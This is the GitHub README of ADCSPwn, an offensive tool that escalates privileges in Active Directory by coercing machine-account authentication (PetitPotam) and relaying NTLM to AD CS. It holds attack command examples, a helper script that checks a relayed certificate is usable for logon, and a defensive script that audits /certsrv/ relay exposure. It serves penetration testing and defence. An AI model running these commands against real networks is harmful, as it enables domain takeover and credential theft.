bats3c/ADCSPwn
GitHub: bats3c/ADCSPwn
An Active Directory privilege-escalation tool that abuses PetitPotam coerced authentication and NTLM relay against AD CS.
Stars: 864 | Forks: 128
# ADCSPwn
A tool to escalate privileges in an Active Directory network by coercing authentication from machine accounts (PetitPotam) and relaying it to the certificate service.
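The relay described above only succeeds when the CA's web enrollment endpoint (`/certsrv/`) accepts a relayed NTLM handshake, that is, over plain HTTP or over HTTPS without Extended Protection for Authentication. The following PowerShell is an added example, not part of ADCSPwn, that reads the three IIS settings deciding this on the CA host itself; it assumes the WebAdministration module that ships with IIS and the default `Default Web Site/CertSrv` application path.

```powershell
# Added example (not ADCSPwn code): audit whether /certsrv/ on this CA host is
# exposed to NTLM relay. Assumes it runs on the CA with the IIS WebAdministration
# module available and that web enrollment sits at the default location.
Import-Module WebAdministration

function Test-CertSrvRelayExposure {
    param(
        [string]$Location = 'Default Web Site/CertSrv'   # assumption: default install path
    )

    $appHost = 'MACHINE/WEBROOT/APPHOST'
    $winAuth = 'system.webServer/security/authentication/windowsAuthentication'

    # Extended Protection: 'Require' binds the NTLM handshake to the TLS channel, so a
    # handshake relayed from another connection is rejected. 'None'/'Allow' leave relay possible.
    $epa = (Get-WebConfiguration -PSPath $appHost -Location $Location `
                -Filter "$winAuth/extendedProtection").tokenChecking

    # sslFlags contains 'Ssl' when the application refuses plain HTTP.
    $sslFlags = (Get-WebConfiguration -PSPath $appHost -Location $Location `
                     -Filter 'system.webServer/security/access').sslFlags

    # Authentication providers offered to clients. 'NTLM', or 'Negotiate' (which can
    # fall back to NTLM), means a relayed NTLM handshake is accepted unless EPA blocks it.
    $providers = (Get-WebConfiguration -PSPath $appHost -Location $Location `
                      -Filter "$winAuth/providers").Collection | ForEach-Object { $_.value }

    $requiresSsl = ("$sslFlags" -match 'Ssl')
    $epaRequired = ("$epa" -eq 'Require')

    [pscustomobject]@{
        Location     = $Location
        Providers    = ($providers -join ', ')
        RequiresSSL  = $requiresSsl
        EPA          = "$epa"
        # Relay is blocked only when plain HTTP is refused AND EPA is required.
        RelayBlocked = ($requiresSsl -and $epaRequired)
    }
}

Test-CertSrvRelayExposure | Format-List
```

`RelayBlocked` is false for a default AD CS web enrollment install, which is the configuration ADCSPwn targets. Microsoft's guidance for closing it (KB5005413, "Mitigating NTLM Relay Attacks on Active Directory Certificate Services") is exactly the pair of settings checked here: require SSL on the application and set Extended Protection to Required, optionally dropping NTLM from the provider list altogether.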
## Usage
Run `ADCSPwn` from a host in the target network. By default it listens for the coerced machine-account authentication itself and relays it to the AD CS web enrollment endpoint; the relay only succeeds if that endpoint accepts NTLM (plain HTTP, or HTTPS without Extended Protection for Authentication).
```
Author: @_batsec_ - MDSec ActiveBreach
Contributor: @Flangvik - TrustedSec
Contributor: @424f424f - Black Hills Information Security

adcspwn.exe --adcs [adcs server] --port [local port] --remote [computer]

Required arguments:

adcs     - This is the address of the AD CS server which authentication will be relayed to.

Optional arguments:

secure   - Use HTTPS with the certificate service.
port     - The port ADCSPwn will listen on.
remote   - Remote machine to trigger authentication from.
username - Username for non-domain context.
password - Password for non-domain context.
dc       - Domain controller to query for Certificate Templates (LDAP).
unc      - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam).
output   - Output path to store base64 generated crt.

Example usage:

adcspwn.exe --adcs cs.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --secure
adcspwn.exe --adcs cs.pwnlab.local --port 9001
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --dc dc.pwnlab.local --unc \\WIN-WORK01.pwnlab.local\made\up\share
```
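The `--output` flag in the examples above writes the issued certificate as base64. Before trying to authenticate with it, it is worth checking that the blob actually carries what certificate logon needs: a Client Authentication EKU, a SAN naming the coerced machine account, a private key, and an unexpired validity period. The following PowerShell is an added example, not part of ADCSPwn; it assumes the file holds a DER-encoded certificate, alone or bundled with its key as a password-less PFX (the `X509Certificate2` byte constructor accepts both), and reuses the `C:\Temp\cert_b64.txt` path from the README example.

```powershell
# Added example (not ADCSPwn code): inspect the base64 certificate written by --output.
# Assumption: the file contains either a bare DER certificate or a PFX without a password.
function Get-RelayedCertInfo {
    param([Parameter(Mandatory)][string]$Path)

    $b64  = (Get-Content -Path $Path -Raw) -replace '\s', ''   # tolerate wrapped lines
    $raw  = [Convert]::FromBase64String($b64)
    $cert = [System.Security.Cryptography.X509Certificates.X509Certificate2]::new($raw)

    # Client Authentication EKU; a cert without it cannot be used for PKINIT/Schannel logon.
    $clientAuthOid = '1.3.6.1.5.5.7.3.2'
    $eku = $cert.Extensions |
        Where-Object { $_ -is [System.Security.Cryptography.X509Certificates.X509EnhancedKeyUsageExtension] } |
        ForEach-Object { $_.EnhancedKeyUsages | ForEach-Object Value }

    # Subject Alternative Name (OID 2.5.29.17) carries the DNS name / UPN that the KDC
    # maps to an account, i.e. the machine account whose authentication was relayed.
    $san = $cert.Extensions |
        Where-Object { $_.Oid.Value -eq '2.5.29.17' } |
        ForEach-Object { $_.Format($false) }

    $hasClientAuth = ($eku -contains $clientAuthOid)
    $unexpired     = ($cert.NotAfter -gt (Get-Date))

    [pscustomobject]@{
        Subject        = $cert.Subject
        Issuer         = $cert.Issuer
        NotAfter       = $cert.NotAfter
        SAN            = $san
        HasPrivateKey  = $cert.HasPrivateKey
        ClientAuthEKU  = $hasClientAuth
        # All three are needed before the certificate is worth presenting to a DC.
        UsableForLogon = ($cert.HasPrivateKey -and $hasClientAuth -and $unexpired)
    }
}

Get-RelayedCertInfo -Path 'C:\Temp\cert_b64.txt' | Format-List
```

If `HasPrivateKey` is false the file held only the public certificate, which is enough to confirm what the CA issued but not to authenticate; if `SAN` is empty, check which template was used, since a template without a subject-name-from-AD SAN will not map to the machine account.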
## Credits
- [@harmj0y](https://twitter.com/harmj0y) and [@tifkin_](https://twitter.com/tifkin_) for their [whitepaper](https://specterops.io/assets/resources/Certified_Pre-Owned.pdf), which describes this issue in detail.
- [@topotam77](https://twitter.com/topotam77) for showing how to abuse `EfsRpcOpenFileRaw`.